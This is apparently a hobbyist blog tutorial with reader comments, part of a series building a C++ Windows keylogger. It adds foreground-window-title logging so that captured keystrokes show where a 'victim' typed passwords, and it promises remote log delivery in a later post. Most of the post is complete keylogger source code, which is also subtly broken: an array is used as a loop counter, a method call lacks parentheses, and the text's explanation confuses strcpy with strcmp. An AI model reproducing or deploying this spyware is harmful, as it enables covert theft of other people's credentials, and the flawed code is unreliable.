---------------------------------------------------------------------------------
Anyways here goes.
So as of now, we have a very simple keylogger, it takes in the keys that the victim types in and outputs them to a specified file. Well there are many problems with this keylogger. I'll help you solve one of these with this post.
Firstly, you would have to go the victims computer to retrieve the file, and most of the time this isn't a possibility. Also, if you have tried the keylogger out, you would have noticed that it doesnt resolve many of the characters like "Enter" and "Shift" and stuff. The next post will deal with ftp uploading and resolving these characters but this post will focus on a very important necessity to any keylogger, getting the window. The problem with many loggers is that you may have some passwords or something but you will never know what these passwords are for. So for that, you need to be able to get the window text.
Also remember that if you get the window text for a browser, it also tells you what webpage they are on, ie yahoo mail so this function can be very useful.
First, we have to familiarize ourselves with the API's that will help us get the window text. They are pretty self explanatory really, GetWindowText(); and GetForegroundWindow();. The msdn's for both are as follows respectively
GetWindowText
GetForegroundWindow()
Okay so after reading those we can see that GetForegroundWindow returns a handle to the foreground window or whatever window is selected. GetWindowText points the text of the window to a buffer with a specific length.
So in order to get the window text of the foreground window all we would have to do would be:
void getwindow(){
char window[MAX_PATH];
HWND currentwindow;
currentwindow = GetForegroundWindow();
GetWindowText(currentwindow, window, sizeof(window));
}
So this simple method returns the foreground window to the handle "currentwindow" and then uses GetWindowText to assign the buffer window with the size using the sizeof function the name of the current window. Well this is all good but when it comes to implementing it into our keylogger, putting this into the main function will just get the window text once, at the start of the program. In contrast, putting this in the check keys loop will get the window text and print it out every single time it goes through the loop, which means that your log will be overflowed with the same window title.
However, what if we put it in the loop, but only print it if the window has changed.
In other words, why dont we check what the window is, and then if that changes, we output the new window, that way we will have the names of all the windows that it were typed into and nothing more or less.
So lets modify our logger function:
void Logger()
{
char key[20];
char currentwindowtitle[MAX_PATH];
char newwindowtitle[MAX_PATH];
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
while(true)
{
Sleep(5);
for(key = 8; key <= 256; key++)
{
if(GetAsyncKeyState(key)&1 == 1)
{
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
if (strcmp(newwindowtitle, currentwindowtitle) != 0)
{
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << endl << currentwindowtitle << endl;
storekey.close;
strcpy(newwindowtitle, currentwindowtitle);
}
StoreKey(key);
}
}
}
}
So lets have a look at what this code does differently from our old Logger() function. First, it initializes the currentwindowtitle variable with the current window, then every time it loops through, it checks if the new window is the same as the old window, using the return value from the strcpy (string copy) function, and if it is different, then it outputs to the logfile. It also then changes the currentwindowtitle to the newtitle and then does it all over again. So there we have it, a keylogger that can tell you exactly where your victim is typing their passwords etc. Have fun, and remember to subscribe and to comment. Remember, if you want to request any functionality for the logger or anything, COMMENT and recommend this site to all your friends! Next post will deal with some very exciting stuff, like sending you the logs, so remember to subscribe so you know when that comes out. Come on guys, show me some love. The following is the complete code of our keylogger so far.
---------------------------------------------------------------------------------
#include <windows.h>
#include <fstream>
using namespace std;
void StoreKey(char key){
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << key;
storekey.close;
}
void Logger()
{
char key[20];
char currentwindowtitle[MAX_PATH];
char newwindowtitle[MAX_PATH];
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
while(true)
{
Sleep(5);
for(key = 8; key <= 256; key++)
{
if(GetAsyncKeyState(key)&1 == 1)
{
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
if (strcmp(newwindowtitle, currentwindowtitle) != 0)
{
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << endl << currentwindowtitle << endl;
storekey.close;
strcpy(newwindowtitle, currentwindowtitle);
}
StoreKey(key);
}
}
}
}
int main(){
Logger();
return 1;
}
-------------------------------------------------------------------------------
Remember to subscribe and COMMENT if you want me to keep writing this. Thanks Guys.
-badfish303
Posts
Good posts. Fallow this way ;) When will you post the next lesson ?
ReplyDeletetoday or tomorrow
ReplyDeletebe sure to recommend this to your friends!
If your wondering who is watching/reading these, you might be able to put a "web-stat tracker" on this site. (i have clicky[http://static.freewebs.getclicky.com/] but you might not be able to get it outside of a freewebs created site, i'll check for you.............please wait
ReplyDeleteCORRECTION!!!!!!
ReplyDeletegoto www.getclicky.com
register
type: name, username, password, URL of website you want to track, E-mail, ect.
And you might have to copy&paste the auto-generated javascript code onto the website
(note: if blogspot doesn't allow javascript on your site, then just look for the link for a code w/out javascript)
Clicky tells you: the time the person visits, how many actions they took, how long they where there, where they came from, what their IP is, what OS they have, what city their computer is in, who their internet provider is, and what browser they have.
Unfortunately, if you use the non-javascript code (its an image based tracker), cant do most of those (i.e. where they came from, ect.) because an image tracking system can only do so much.
hope this was of use to you
ByE
P.S. the C++ keylogger is great im gonna bookmark you site and read them all :)
KK i keep getting conversion errors while compiling it with visual c++ 2008 express plz help :(
ReplyDeleteHey Badfish, I'm pretty noob at C++, I can't wright it but I can understand most of it. I'm interested in learning however and ur tuts are awesome. I registered hoping you would finish your keylogging tutorial and also to ask you for contact information if you didn't mind teaching me some stuff :) ~Iconic
ReplyDelete